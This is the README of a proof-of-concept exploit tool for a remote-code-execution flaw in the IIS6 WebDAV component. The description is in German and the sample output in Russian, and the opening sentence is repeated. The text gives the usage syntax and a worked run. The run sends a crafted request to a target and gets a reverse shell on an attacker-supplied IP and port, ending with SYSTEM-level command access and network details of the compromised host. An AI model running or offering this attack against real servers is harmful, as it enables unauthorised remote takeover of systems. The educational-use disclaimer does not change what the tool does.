
ist ein PoC-Tool, das einen Exploit für eine bekannte Schwachstelle in der WebDAV-Komponente von IIS6 demonstriert.
GenWebDavIISExploit ist ein PoC-Tool, das einen Exploit für eine bekannte Schwachstelle in der WebDAV-Komponente von IIS6 demonstriert. Dieses Tool wurde zu Bildungs- und Forschungszwecken entwickelt, um zu zeigen, wie die Schwachstelle ausgenutzt werden kann, um beliebigen Code auf einem entfernten Server auszuführen.
Dieses Projekt ist nur für Bildungszwecke bestimmt. Verwenden Sie dieses Tool verantwortungsvoll und nur auf Systemen, die Sie besitzen oder für die Sie ausdrücklich die Erlaubnis zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal.
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1